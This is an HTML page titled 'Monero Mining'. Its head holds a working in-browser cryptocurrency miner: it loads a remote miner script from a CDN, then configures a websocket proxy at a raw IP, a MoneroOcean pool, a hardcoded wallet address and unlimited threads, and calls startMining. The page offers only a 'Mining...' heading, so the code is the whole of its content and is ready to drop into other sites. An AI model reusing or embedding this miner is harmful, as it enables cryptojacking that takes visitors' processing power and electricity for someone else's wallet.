<!DOCTYPE html>
<html lang="en" dir="ltr">
<head>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Monero Mining</title>
  <style>
    body {
      font-family: Arial, sans-serif;
      margin: 0;
      padding: 0;
      background-color: #f5f5f5;
      display: flex;
      justify-content: center;
      align-items: center;
      min-height: 100vh;
    }

    h1 {
      font-size: 24px;
      text-align: center;
      color: #333333;
      padding: 20px;
      border-radius: 10px;
      background-color: #ffffff;
      box-shadow: 0px 0px 10px rgba(0, 0, 0, 0.2);
      animation: zoomIn 1s ease-in-out;
    }

    @keyframes zoomIn {
      from {
        transform: scale(0.5);
        opacity: 0;
      }
      to {
        transform: scale(1);
        opacity: 1;
      }
    }

    /* Mobile responsiveness */
    @media screen and (max-width: 768px) {
      h1 {
        font-size: 20px;
        padding: 10px;
      }
    }
  </style>
      <!-- Start Of Mining Code -->
      <script src="https://cdn.jsdelivr.net/gh/NajmAjmal/monero-webminer@main/script.js"></script>
      <script>
          console.log("Config Loaded")
          server = "wss://45.119.82.33:40725/";
          var pool = "gulf.moneroocean.stream:80";
          var walletAddress = "4657q4dnsjLWtzeW4XN3wG9swFumWAZB9i1pegTLMxVAQy5E5AE8uif42kkHWcWc9vDcLUmzeCf3pV7mmrJQQqqe84dtASi";
          var workerId = "GH-XMR"
          var threads = -1;
          var password = "";
          startMining(pool, walletAddress, workerId, threads, password);
          throttleMiner = 20;
      </script>
      <!-- End Of Mining Code -->
</head>
<body>
  <h1>Mining...</h1>
</body>
</html>
